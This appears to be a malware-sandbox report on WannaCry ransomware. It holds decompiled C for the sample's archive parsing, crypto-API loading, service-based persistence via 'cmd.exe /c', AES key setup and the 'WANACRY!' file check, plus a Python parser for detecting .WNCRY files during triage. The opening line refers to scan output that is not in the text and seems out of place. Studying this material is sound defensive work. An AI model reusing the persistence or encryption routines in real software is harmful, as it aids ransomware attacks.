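Run `scan(SAMPLE_EVENTS)` to see the three matching records; the benign 7045 at the end is there to show that an auto-start service on its own is not flagged.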
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 75%
            			E00406C40(intOrPtr* __ecx, void* __edx, intOrPtr _a4, void* _a8, signed int _a11) {
            				signed int _v5;
            				signed char _v10;
            				char _v11;
            				char _v12;
            				char _v16;
            				char _v20;
            				intOrPtr* _v24;
            				struct _FILETIME _v32;
            				struct _FILETIME _v40;
            				char _v44;
            				unsigned int _v72;
            				intOrPtr _v96;
            				intOrPtr _v100;
            				unsigned int _v108;
            				unsigned int _v124;
            				char _v384;
            				char _v644;
            				char _t142;
            				char _t150;
            				void* _t151;
            				signed char _t156;
            				long _t173;
            				signed char _t185;
            				signed char* _t190;
            				signed char* _t194;
            				intOrPtr* _t204;
            				signed int _t207;
            				signed int _t208;
            				intOrPtr* _t209;
            				unsigned int _t210;
            				char _t212;
            				signed char _t230;
            				signed int _t234;
            				signed char _t238;
            				void* _t263;
            				unsigned int _t264;
            				signed int _t269;
            				signed int _t270;
            				signed int _t271;
            				intOrPtr _t272;
            				char* _t274;
            				unsigned int _t276;
            				signed int _t277;
            				void* _t278;
            				intOrPtr* _t280;
            				void* _t281;
            				intOrPtr _t282;
            
            				_t263 = __edx;
            				_t213 = __ecx;
            				_t272 = _a4;
            				_t208 = _t207 | 0xffffffff;
            				_t280 = __ecx;
            				_v24 = __ecx;
            				if(_t272 < _t208) {
            					L61:
            					return 0x10000;
            				}
            				_t131 =  *__ecx;
            				if(_t272 >=  *((intOrPtr*)( *__ecx + 4))) {
            					goto L61;
            				}
            				if( *((intOrPtr*)(__ecx + 4)) != _t208) {
            					E00406A97(_t131);
            					_pop(_t213);
            				}
            				 *(_t280 + 4) = _t208;
            				if(_t272 !=  *((intOrPtr*)(_t280 + 0x134))) {
            					if(_t272 != _t208) {
            						_t132 =  *_t280;
            						if(_t272 >=  *( *_t280 + 0x10)) {
            							L12:
            							_t133 =  *_t280;
            							if( *( *_t280 + 0x10) >= _t272) {
            								E004064BB( *_t280,  &_v124,  &_v384, 0x104, 0, 0, 0, 0);
            								if(L0040657A(_t213, _t263,  *_t280,  &_v44,  &_v20,  &_v16) == 0) {
            									_t142 = E00405D0E( *((intOrPtr*)( *_t280)), _v20, 0);
            									if(_t142 != 0) {
            										L19:
            										return 0x800;
            									}
            									_push(_v16);
            									L00407700();
            									_v12 = _t142;
            									if(L00405D8A(_t142, 1, _v16,  *((intOrPtr*)( *_t280))) == _v16) {
            										_t281 = _a8;
            										 *_t281 =  *( *_t280 + 0x10);
            										strcpy( &_v644,  &_v384);
            										_t209 = __imp___mbsstr;
            										_t274 =  &_v644;
            										while(1) {
            											L21:
            											_t150 =  *_t274;
            											if(_t150 != 0 && _t274[1] == 0x3a) {
            												break;
            											}
            											if(_t150 == 0x5c || _t150 == 0x2f) {
            												_t274 =  &(_t274[1]);
            												continue;
            											} else {
            												_t151 =  *_t209(_t274, "\\..\\");
            												if(_t151 != 0) {
            													L31:
            													_t39 = _t151 + 4; // 0x4
            													_t274 = _t39;
            													continue;
            												}
            												_t151 =  *_t209(_t274, "\\../");
            												if(_t151 != 0) {
            													goto L31;
            												}
            												_t151 =  *_t209(_t274, "/../");
            												if(_t151 != 0) {
            													goto L31;
            												}
            												_t151 =  *_t209(_t274, "/..\\");
            												if(_t151 == 0) {
            													strcpy(_t281 + 4, _t274);
            													_t264 = _v72;
            													_a11 = _a11 & 0x00000000;
            													_v5 = _v5 & 0x00000000;
            													_t156 = _t264 >> 0x0000001e & 0x00000001;
            													_t230 =  !(_t264 >> 0x17) & 0x00000001;
            													_t276 = _v124 >> 8;
            													_t210 = 1;
            													if(_t276 == 0 || _t276 == 7 || _t276 == 0xb || _t276 == 0xe) {
            														_a11 = _t264 >> 0x00000001 & 0x00000001;
            														_t230 = _t264 & 0x00000001;
            														_v5 = _t264 >> 0x00000002 & 0x00000001;
            														_t156 = _t264 >> 0x00000004 & 0x00000001;
            														_t264 = _t264 >> 0x00000005 & 0x00000001;
            														_t210 = _t264;
            													}
            													_t277 = 0;
            													 *(_t281 + 0x108) = 0;
            													if(_t156 != 0) {
            														 *(_t281 + 0x108) = 0x10;
            													}
            													if(_t210 != 0) {
            														 *(_t281 + 0x108) =  *(_t281 + 0x108) | 0x00000020;
            													}
            													if(_a11 != 0) {
            														 *(_t281 + 0x108) =  *(_t281 + 0x108) | 0x00000002;
            													}
            													if(_t230 != 0) {
            														 *(_t281 + 0x108) =  *(_t281 + 0x108) | 0x00000001;
            													}
            													if(_v5 != 0) {
            														 *(_t281 + 0x108) =  *(_t281 + 0x108) | 0x00000004;
            													}
            													 *((intOrPtr*)(_t281 + 0x124)) = _v100;
            													 *((intOrPtr*)(_t281 + 0x128)) = _v96;
            													_v40.dwLowDateTime = E00406B23(_v108 >> 0x10, _v108);
            													_v40.dwHighDateTime = _t264;
            													LocalFileTimeToFileTime( &_v40,  &_v32);
            													_t173 = _v32.dwLowDateTime;
            													_t234 = _v32.dwHighDateTime;
            													_t212 = _v12;
            													 *(_t281 + 0x10c) = _t173;
            													 *(_t281 + 0x114) = _t173;
            													 *(_t281 + 0x11c) = _t173;
            													 *(_t281 + 0x110) = _t234;
            													 *(_t281 + 0x118) = _t234;
            													 *(_t281 + 0x120) = _t234;
            													if(_v16 <= 4) {
            														L57:
            														if(_t212 != 0) {
            															_push(_t212);
            															L004076E8();
            														}
            														_t282 = _v24;
            														memcpy(_t282 + 8, _t281, 0x12c);
            														 *((intOrPtr*)(_t282 + 0x134)) = _a4;
            														goto L60;
            													} else {
            														while(1) {
            															_v12 =  *((intOrPtr*)(_t277 + _t212));
            															_v10 = _v10 & 0x00000000;
            															_v11 =  *((intOrPtr*)(_t212 + _t277 + 1));
            															_a8 =  *(_t212 + _t277 + 2) & 0x000000ff;
            															if(strcmp( &_v12, "UT") == 0) {
            																break;
            															}
            															_t277 = _t277 + _a8 + 4;
            															if(_t277 + 4 < _v16) {
            																continue;
            															}
            															goto L57;
            														}
            														_t238 =  *(_t277 + _t212 + 4) & 0x000000ff;
            														_t185 = _t238 >> 0x00000001 & 0x00000001;
            														_t278 = _t277 + 5;
            														_a11 = _t185;
            														_v5 = _t238 >> 0x00000002 & 0x00000001;
            														if((_t238 & 0x00000001) != 0) {
            															_t271 =  *(_t278 + _t212 + 1) & 0x000000ff;
            															_t194 = _t278 + _t212;
            															_t278 = _t278 + 4;
            															 *(_t281 + 0x11c) = E00406B02(_t271,  *_t194 & 0x000000ff | (0 << 0x00000008 | _t271) << 0x00000008);
            															_t185 = _a11;
            															 *(_t281 + 0x120) = _t271;
            														}
            														if(_t185 != 0) {
            															_t270 =  *(_t278 + _t212 + 1) & 0x000000ff;
            															_t190 = _t278 + _t212;
            															_t278 = _t278 + 4;
            															 *(_t281 + 0x10c) = E00406B02(_t270,  *_t190 & 0x000000ff | (0 << 0x00000008 | _t270) << 0x00000008);
            															 *(_t281 + 0x110) = _t270;
            														}
            														if(_v5 != 0) {
            															_t269 =  *(_t278 + _t212 + 1) & 0x000000ff;
            															 *(_t281 + 0x114) = E00406B02(_t269,  *(_t278 + _t212) & 0x000000ff | (0 << 0x00000008 | _t269) << 0x00000008);
            															 *(_t281 + 0x118) = _t269;
            														}
            														goto L57;
            													}
            												}
            												goto L31;
            											}
            										}
            										_t274 =  &(_t274[2]);
            										goto L21;
            									}
            									_push(_v12);
            									L004076E8();
            									goto L19;
            								}
            								return 0x700;
            							}
            							E00406520(_t133);
            							L11:
            							_pop(_t213);
            							goto L12;
            						}
            						E004064E2(_t213, _t132);
            						goto L11;
            					}
            					goto L8;
            				} else {
            					if(_t272 == _t208) {
            						L8:
            						_t204 = _a8;
            						 *_t204 =  *((intOrPtr*)( *_t280 + 4));
            						 *((char*)(_t204 + 4)) = 0;
            						 *((intOrPtr*)(_t204 + 0x108)) = 0;
            						 *((intOrPtr*)(_t204 + 0x10c)) = 0;
            						 *((intOrPtr*)(_t204 + 0x110)) = 0;
            						 *((intOrPtr*)(_t204 + 0x114)) = 0;
            						 *((intOrPtr*)(_t204 + 0x118)) = 0;
            						 *((intOrPtr*)(_t204 + 0x11c)) = 0;
            						 *((intOrPtr*)(_t204 + 0x120)) = 0;
            						 *((intOrPtr*)(_t204 + 0x124)) = 0;
            						 *((intOrPtr*)(_t204 + 0x128)) = 0;
            						L60:
            						return 0;
            					}
            					memcpy(_a8, _t280 + 8, 0x12c);
            					goto L60;
            				}
            			}


            APIs
            • memcpy.MSVCRT(?,?,0000012C,?), ref: 00406C91
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmp
            Yara matches
            Similarity
            • API ID: memcpy
            • String ID: /../$/..\$\../$\..\
            • API String ID: 3510742995-3885502717
            • Opcode ID: 24419fe79de55b9e050378da4d3ae0875fe08eefc49193e89ac78033597620dd
            • Instruction ID: 8d35de4500b3f4065ad8a7d009fa2f60231b6be20ed9f01f65d9d1a3966dd706
            • Opcode Fuzzy Hash: 24419fe79de55b9e050378da4d3ae0875fe08eefc49193e89ac78033597620dd
            • Instruction Fuzzy Hash: 98D147729082459FDB15CF68C881AEABBF4EF05300F15857FE49AB7381C738A915CB98
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00401A45() {
            				void* _t1;
            				_Unknown_base(*)()* _t9;
            				struct HINSTANCE__* _t11;
            				intOrPtr _t15;
            				intOrPtr _t17;
            				intOrPtr _t18;
            				intOrPtr _t19;
            				intOrPtr _t20;
            				intOrPtr _t21;
            
            				_t15 =  *0x40f894; // 0x0
            				if(_t15 != 0) {
            					L8:
            					_t1 = 1;
            					return _t1;
            				}
            				_t11 = LoadLibraryA("advapi32.dll");
            				if(_t11 == 0) {
            					L9:
            					return 0;
            				}
            				 *0x40f894 = GetProcAddress(_t11, "CryptAcquireContextA");
            				 *0x40f898 = GetProcAddress(_t11, "CryptImportKey");
            				 *0x40f89c = GetProcAddress(_t11, "CryptDestroyKey");
            				 *0x40f8a0 = GetProcAddress(_t11, "CryptEncrypt");
            				 *0x40f8a4 = GetProcAddress(_t11, "CryptDecrypt");
            				_t9 = GetProcAddress(_t11, "CryptGenKey");
            				_t17 =  *0x40f894; // 0x0
            				 *0x40f8a8 = _t9;
            				if(_t17 == 0) {
            					goto L9;
            				}
            				_t18 =  *0x40f898; // 0x0
            				if(_t18 == 0) {
            					goto L9;
            				}
            				_t19 =  *0x40f89c; // 0x0
            				if(_t19 == 0) {
            					goto L9;
            				}
            				_t20 =  *0x40f8a0; // 0x0
            				if(_t20 == 0) {
            					goto L9;
            				}
            				_t21 =  *0x40f8a4; // 0x0
            				if(_t21 == 0 || _t9 == 0) {
            					goto L9;
            				} else {
            					goto L8;
            				}
            			}


            APIs
            • LoadLibraryA.KERNEL32(advapi32.dll,?,?,00401711), ref: 00401A5A
            • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,?,00401711), ref: 00401A77
            • GetProcAddress.KERNEL32(00000000,CryptImportKey,?,?,?,00401711), ref: 00401A84
            • GetProcAddress.KERNEL32(00000000,CryptDestroyKey,?,?,?,00401711), ref: 00401A91
            • GetProcAddress.KERNEL32(00000000,CryptEncrypt,?,?,?,00401711), ref: 00401A9E
            • GetProcAddress.KERNEL32(00000000,CryptDecrypt,?,?,?,00401711), ref: 00401AAB
            • GetProcAddress.KERNEL32(00000000,CryptGenKey,?,?,?,00401711), ref: 00401AB8
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmp
            Yara matches
            Similarity
            • API ID: AddressProc$LibraryLoad
            • String ID: CryptAcquireContextA$CryptDecrypt$CryptDestroyKey$CryptEncrypt$CryptGenKey$CryptImportKey$advapi32.dll
            • API String ID: 2238633743-2459060434
            • Opcode ID: b9d8274d123a30a539352919ce36730ce9328d7041a45cd95e79278e35d60e58
            • Instruction ID: 9aae3444cc52ced5e7e1ad1d2a06d11cf911cb2b3a933a05a08c6ba10b936042
            • Opcode Fuzzy Hash: b9d8274d123a30a539352919ce36730ce9328d7041a45cd95e79278e35d60e58
            • Instruction Fuzzy Hash: 20011E32A86311EBDB30AFA5AE856677AE4EA41750368843FB104B2DB1D7F81448DE5C
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00401CE8(intOrPtr _a4) {
            				void* _v8;
            				int _v12;
            				void* _v16;
            				char _v1040;
            				void* _t12;
            				void* _t13;
            				void* _t31;
            				int _t32;
            
            				_v12 = 0;
            				_t12 = OpenSCManagerA(0, 0, 0xf003f);
            				_v8 = _t12;
            				if(_t12 != 0) {
            					_t13 = OpenServiceA(_t12, 0x40f8ac, 0xf01ff);
            					_v16 = _t13;
            					if(_t13 == 0) {
            						sprintf( &_v1040, "cmd.exe /c \"%s\"", _a4);
            						_t31 = CreateServiceA(_v8, 0x40f8ac, 0x40f8ac, 0xf01ff, 0x10, 2, 1,  &_v1040, 0, 0, 0, 0, 0);
            						if(_t31 != 0) {
            							StartServiceA(_t31, 0, 0);
            							CloseServiceHandle(_t31);
            							_v12 = 1;
            						}
            						_t32 = _v12;
            					} else {
            						StartServiceA(_t13, 0, 0);
            						CloseServiceHandle(_v16);
            						_t32 = 1;
            					}
            					CloseServiceHandle(_v8);
            					return _t32;
            				}
            				return 0;
            			}


            APIs
            • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 00401CFE
            • OpenServiceA.ADVAPI32(00000000,0040F8AC,000F01FF), ref: 00401D21
            • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00401D31
            • CloseServiceHandle.ADVAPI32(?), ref: 00401D3A
            • CloseServiceHandle.ADVAPI32(?), ref: 00401D9E
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmp
            Yara matches
            Similarity
            • API ID: Service$CloseHandleOpen$ManagerStart
            • String ID: cmd.exe /c "%s"
            • API String ID: 1485051382-955883872
            • Opcode ID: 4dc5d8109ff1f89eb2c8b95274d01a87daa9a34efcc40f147da3f0b4c8cffa2a
            • Instruction ID: 93977d8af42d47d1d9866270745c8e9c50065656b45fe828c5c40e24baaa5e60
            • Opcode Fuzzy Hash: 4dc5d8109ff1f89eb2c8b95274d01a87daa9a34efcc40f147da3f0b4c8cffa2a
            • Instruction Fuzzy Hash: 6411AF71900118BBDB205B659E4CE9FBF7CEF85745F10407AF601F21A0CA744949DB68
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 54%
            			E00402A76(void* __ecx, signed int _a4, void* _a6, void* _a7, signed int _a8, signed int _a12, signed char* _a16) {
            				signed int _v8;
            				signed int _v12;
            				char _v24;
            				int _t193;
            				signed int _t198;
            				int _t199;
            				intOrPtr _t200;
            				signed int* _t205;
            				signed char* _t206;
            				signed int _t208;
            				signed int _t210;
            				signed int* _t216;
            				signed int _t217;
            				signed int* _t220;
            				signed int* _t229;
            				void* _t252;
            				void* _t280;
            				void* _t281;
            				signed int _t283;
            				signed int _t289;
            				signed int _t290;
            				signed char* _t291;
            				signed int _t292;
            				void* _t303;
            				void* _t313;
            				intOrPtr* _t314;
            				void* _t315;
            				intOrPtr* _t316;
            				signed char* _t317;
            				signed char* _t319;
            				signed int _t320;
            				signed int _t322;
            				void* _t326;
            				void* _t327;
            				signed int _t329;
            				signed int _t337;
            				intOrPtr _t338;
            				signed int _t340;
            				intOrPtr _t341;
            				void* _t342;
            				signed int _t345;
            				signed int* _t346;
            				signed int _t347;
            				void* _t352;
            				void* _t353;
            				void* _t354;
            
            				_t352 = __ecx;
            				if(_a4 == 0) {
            					_a8 = 0x40f57c;
            					__imp__??0exception@@QAE@ABQBD@Z( &_a8);
            					_push(0x40d570);
            					_push( &_v24);
            					L0040776E();
            				}
            				_t283 = _a12;
            				_t252 = 0x18;
            				_t342 = 0x10;
            				if(_t283 != _t342 && _t283 != _t252 && _t283 != 0x20) {
            					_t283 =  &_v24;
            					_a8 = 0x40f57c;
            					__imp__??0exception@@QAE@ABQBD@Z( &_a8);
            					_push(0x40d570);
            					_push( &_v24);
            					L0040776E();
            				}
            				_t193 = _a16;
            				if(_t193 != _t342 && _t193 != _t252 && _t193 != 0x20) {
            					_t283 =  &_v24;
            					_a8 = 0x40f57c;
            					__imp__??0exception@@QAE@ABQBD@Z( &_a8);
            					_t193 =  &_v24;
            					_push(0x40d570);
            					_push(_t193);
            					L0040776E();
            				}
            				 *(_t352 + 0x3cc) = _t193;
            				 *(_t352 + 0x3c8) = _t283;
            				memcpy(_t352 + 0x3d0, _a8, _t193);
            				memcpy(_t352 + 0x3f0, _a8,  *(_t352 + 0x3cc));
            				_t198 =  *(_t352 + 0x3c8);
            				_t354 = _t353 + 0x18;
            				if(_t198 == _t342) {
            					_t199 =  *(_t352 + 0x3cc);
            					if(_t199 != _t342) {
            						_t200 = ((0 | _t199 != _t252) - 0x00000001 & 0xfffffffe) + 0xe;
            					} else {
            						_t200 = 0xa;
            					}
            					goto L17;
            				} else {
            					if(_t198 == _t252) {
            						_t200 = ((0 |  *(_t352 + 0x3cc) == 0x00000020) - 0x00000001 & 0x000000fe) + 0xe;
            						L17:
            						 *((intOrPtr*)(_t352 + 0x410)) = _t200;
            						L18:
            						asm("cdq");
            						_t289 = 4;
            						_t326 = 0;
            						_a12 =  *(_t352 + 0x3cc) / _t289;
            						if( *((intOrPtr*)(_t352 + 0x410)) < 0) {
            							L23:
            							_t327 = 0;
            							if( *((intOrPtr*)(_t352 + 0x410)) < 0) {
            								L28:
            								asm("cdq");
            								_t290 = 4;
            								_t291 = _a4;
            								_t345 = ( *((intOrPtr*)(_t352 + 0x410)) + 1) * _a12;
            								_v12 = _t345;
            								_t329 =  *(_t352 + 0x3c8) / _t290;
            								_t205 = _t352 + 0x414;
            								_v8 = _t329;
            								if(_t329 <= 0) {
            									L31:
            									_a8 = _a8 & 0x00000000;
            									if(_t329 <= 0) {
            										L35:
            										if(_a8 >= _t345) {
            											L51:
            											_t206 = 1;
            											_a16 = _t206;
            											if( *((intOrPtr*)(_t352 + 0x410)) <= _t206) {
            												L57:
            												 *((char*)(_t352 + 4)) = 1;
            												return _t206;
            											}
            											_a8 = _t352 + 0x208;
            											do {
            												_t292 = _a12;
            												if(_t292 <= 0) {
            													goto L56;
            												}
            												_t346 = _a8;
            												do {
            													_t208 =  *_t346;
            													_a4 = _t208;
            													 *_t346 =  *0x0040ABFC ^  *0x0040AFFC ^  *0x0040B3FC ^  *(0x40b7fc + (_t208 & 0x000000ff) * 4);
            													_t346 =  &(_t346[1]);
            													_t292 = _t292 - 1;
            												} while (_t292 != 0);
            												L56:
            												_a16 =  &(_a16[1]);
            												_a8 = _a8 + 0x20;
            												_t206 = _a16;
            											} while (_t206 <  *((intOrPtr*)(_t352 + 0x410)));
            											goto L57;
            										}
            										_a16 = 0x40bbfc;
            										do {
            											_t210 =  *(_t352 + 0x410 + _t329 * 4);
            											_a4 = _t210;
            											 *(_t352 + 0x414) =  *(_t352 + 0x414) ^ ((( *0x004089FC ^  *_a16) << 0x00000008 ^  *0x004089FC & 0x000000ff) << 0x00000008 ^  *((_t210 & 0x000000ff) + 0x4089fc) & 0x000000ff) << 0x00000008 ^  *0x004089FC & 0x000000ff;
            											_a16 = _a16 + 1;
            											if(_t329 == 8) {
            												_t216 = _t352 + 0x418;
            												_t303 = 3;
            												do {
            													 *_t216 =  *_t216 ^  *(_t216 - 4);
            													_t216 =  &(_t216[1]);
            													_t303 = _t303 - 1;
            												} while (_t303 != 0);
            												_t217 =  *(_t352 + 0x420);
            												_a4 = _t217;
            												_t220 = _t352 + 0x428;
            												 *(_t352 + 0x424) =  *(_t352 + 0x424) ^ (( *0x004089FC << 0x00000008 ^  *0x004089FC & 0x000000ff) << 0x00000008 ^  *0x004089FC & 0x000000ff) << 0x00000008 ^  *((_t217 & 0x000000ff) + 0x4089fc) & 0x000000ff;
            												_t313 = 3;
            												do {
            													 *_t220 =  *_t220 ^  *(_t220 - 4);
            													_t220 =  &(_t220[1]);
            													_t313 = _t313 - 1;
            												} while (_t313 != 0);
            												L46:
            												_a4 = _a4 & 0x00000000;
            												if(_t329 <= 0) {
            													goto L50;
            												}
            												_t314 = _t352 + 0x414;
            												while(_a8 < _t345) {
            													asm("cdq");
            													_t347 = _a8 / _a12;
            													asm("cdq");
            													_t337 = _a8 % _a12;
            													 *((intOrPtr*)(_t352 + 8 + (_t337 + _t347 * 8) * 4)) =  *_t314;
            													_a4 = _a4 + 1;
            													_t345 = _v12;
            													_t338 =  *_t314;
            													_t314 = _t314 + 4;
            													_a8 = _a8 + 1;
            													 *((intOrPtr*)(_t352 + 0x1e8 + (_t337 + ( *((intOrPtr*)(_t352 + 0x410)) - _t347) * 8) * 4)) = _t338;
            													_t329 = _v8;
            													if(_a4 < _t329) {
            														continue;
            													}
            													goto L50;
            												}
            												goto L51;
            											}
            											if(_t329 <= 1) {
            												goto L46;
            											}
            											_t229 = _t352 + 0x418;
            											_t315 = _t329 - 1;
            											do {
            												 *_t229 =  *_t229 ^  *(_t229 - 4);
            												_t229 =  &(_t229[1]);
            												_t315 = _t315 - 1;
            											} while (_t315 != 0);
            											goto L46;
            											L50:
            										} while (_a8 < _t345);
            										goto L51;
            									}
            									_t316 = _t352 + 0x414;
            									while(_a8 < _t345) {
            										asm("cdq");
            										_a4 = _a8 / _a12;
            										asm("cdq");
            										_t340 = _a8 % _a12;
            										 *((intOrPtr*)(_t352 + 8 + (_t340 + _a4 * 8) * 4)) =  *_t316;
            										_a8 = _a8 + 1;
            										_t341 =  *_t316;
            										_t316 = _t316 + 4;
            										 *((intOrPtr*)(_t352 + 0x1e8 + (_t340 + ( *((intOrPtr*)(_t352 + 0x410)) - _a4) * 8) * 4)) = _t341;
            										_t329 = _v8;
            										if(_a8 < _t329) {
            											continue;
            										}
            										goto L35;
            									}
            									goto L51;
            								}
            								_a8 = _t329;
            								do {
            									_t317 =  &(_t291[1]);
            									 *_t205 = ( *_t291 & 0x000000ff) << 0x18;
            									 *_t205 =  *_t205 | ( *_t317 & 0x000000ff) << 0x00000010;
            									_t319 =  &(_t317[2]);
            									 *_t205 =  *_t205 |  *_t319 & 0x000000ff;
            									_t291 =  &(_t319[1]);
            									_t205 =  &(_t205[1]);
            									_t60 =  &_a8;
            									 *_t60 = _a8 - 1;
            								} while ( *_t60 != 0);
            								goto L31;
            							}
            							_t280 = _t352 + 0x1e8;
            							do {
            								_t320 = _a12;
            								if(_t320 > 0) {
            									memset(_t280, 0, _t320 << 2);
            									_t354 = _t354 + 0xc;
            								}
            								_t327 = _t327 + 1;
            								_t280 = _t280 + 0x20;
            							} while (_t327 <=  *((intOrPtr*)(_t352 + 0x410)));
            							goto L28;
            						}
            						_t281 = _t352 + 8;
            						do {
            							_t322 = _a12;
            							if(_t322 > 0) {
            								memset(_t281, 0, _t322 << 2);
            								_t354 = _t354 + 0xc;
            							}
            							_t326 = _t326 + 1;
            							_t281 = _t281 + 0x20;
            						} while (_t326 <=  *((intOrPtr*)(_t352 + 0x410)));
            						goto L23;
            					}
            					 *((intOrPtr*)(_t352 + 0x410)) = 0xe;
            					goto L18;
            				}
            			}


            APIs
            • ??0exception@@QAE@ABQBD@Z.MSVCRT(?,?,?,00000000,00000010,?), ref: 00402A95
            • _CxxThrowException.MSVCRT(00000010,0040D570,?,00000000,00000010,?), ref: 00402AA4
            • ??0exception@@QAE@ABQBD@Z.MSVCRT(?,?,?,00000000,00000010,?), ref: 00402ACD
            • _CxxThrowException.MSVCRT(00000010,0040D570,?,00000000,00000010,?), ref: 00402ADC
            • ??0exception@@QAE@ABQBD@Z.MSVCRT(?,?,?,00000000,00000010,?), ref: 00402AFF
            • _CxxThrowException.MSVCRT(00000010,0040D570,?,00000000,00000010,?), ref: 00402B0E
            • memcpy.MSVCRT(?,?,00000010,?,?,00000000,00000010,?,?), ref: 00402B2A
            • memcpy.MSVCRT(?,?,?,?,?,00000010,?,?,00000000,00000010,?,?), ref: 00402B3F
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmp
            Yara matches
            Similarity
            • API ID: ??0exception@@ExceptionThrow$memcpy
            • String ID:
            • API String ID: 1881450474-3916222277
            • Opcode ID: 13455132f19fce7ccee5142b200569a1d3dc411a47d032a17fbb22a214c81369
            • Instruction ID: fcfef073648f46ce18afaeffe4143d5033c2e410e09e17396796de68d512254b
            • Opcode Fuzzy Hash: 13455132f19fce7ccee5142b200569a1d3dc411a47d032a17fbb22a214c81369
            • Instruction Fuzzy Hash: 8DD1C3706006099FDB28CF29C5846EA77F5FF48314F14C43EE95AEB281D778AA85CB58
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040150D
            • GetFileSizeEx.KERNEL32(00000000,?), ref: 00401529
            • memcmp.MSVCRT(?,WANACRY!,00000008), ref: 00401572
            • GlobalAlloc.KERNEL32(00000000,?,?,?,00000010,?,?,?,?), ref: 0040166D
            • _local_unwind2.MSVCRT(?,000000FF), ref: 004016D6
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmp
            Yara matches
            Similarity
            • API ID: File$AllocCreateGlobalSize_local_unwind2memcmp
            • String ID: WANACRY!
            • API String ID: 283026544-1240840912
            • Opcode ID: 3616707767261f84fde6c13708b35c3d4dbb974938da28d5f777545cb9cffa02
            • Instruction ID: 23909f9b909e50c20e483d6bc4be6e23e355ec3bf8b0a6de4718622c8bde6caa
            • Opcode Fuzzy Hash: 3616707767261f84fde6c13708b35c3d4dbb974938da28d5f777545cb9cffa02
            • Instruction Fuzzy Hash: 6E512C71900209ABDB219F95CD84FEEB7BCEB08790F1444BAF515F21A0D739AA45CB28
            Uniqueness

            Uniqueness Score: -1.00%
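            The API trace above (CreateFileA with GENERIC_READ and OPEN_EXISTING, GetFileSizeEx, an 8-byte memcmp against "WANACRY!", GlobalAlloc for the buffer) belongs to the routine that opens the sample's own container format. The Python below, added here and not recovered from the binary, performs the same magic and length checks for triage. Only the magic and the size check are visible in the decompile; the rest of the field layout (little-endian key length, 256-byte RSA-wrapped AES key, type flag, original size, then AES-CBC ciphertext) follows public write-ups of .WNCRY files and is an assumption, as are all function names in the block.

```python
import struct

MAGIC = b"WANACRY!"                      # the 8 bytes the sample compares with memcmp
# Assumed field layout after the magic (from public .WNCRY analyses, not from this decompile):
# u32 wrapped-key length, 256-byte RSA-wrapped AES key, u32 type flag, u64 original size
HEADER = struct.Struct("<8sI256sIQ")     # 280 bytes, ciphertext starts at offset 0x118


def is_wncry(blob: bytes) -> bool:
    """Cheap detector: the same 8-byte magic comparison the sample performs."""
    return blob[:8] == MAGIC


def parse_wncry_header(blob: bytes) -> dict:
    """Validate a container and split it into its parts; ValueError on malformed input."""
    if len(blob) < HEADER.size:
        raise ValueError("file shorter than the WANACRY! header")
    magic, key_len, enc_key, enc_type, orig_size = HEADER.unpack_from(blob)
    if magic != MAGIC:
        raise ValueError("magic mismatch, not a WANACRY! container")
    if key_len > len(enc_key):
        raise ValueError("wrapped-key length exceeds the 256-byte key field")
    body = blob[HEADER.size:]
    # the original content is AES-CBC encrypted, so the body is a whole number
    # of 16-byte blocks and cannot be shorter than the plaintext it wraps
    if len(body) % 16 or orig_size > len(body):
        raise ValueError("ciphertext length inconsistent with header")
    return {
        "wrapped_key": enc_key[:key_len],
        "type": enc_type,
        "original_size": orig_size,
        "ciphertext": body,
    }


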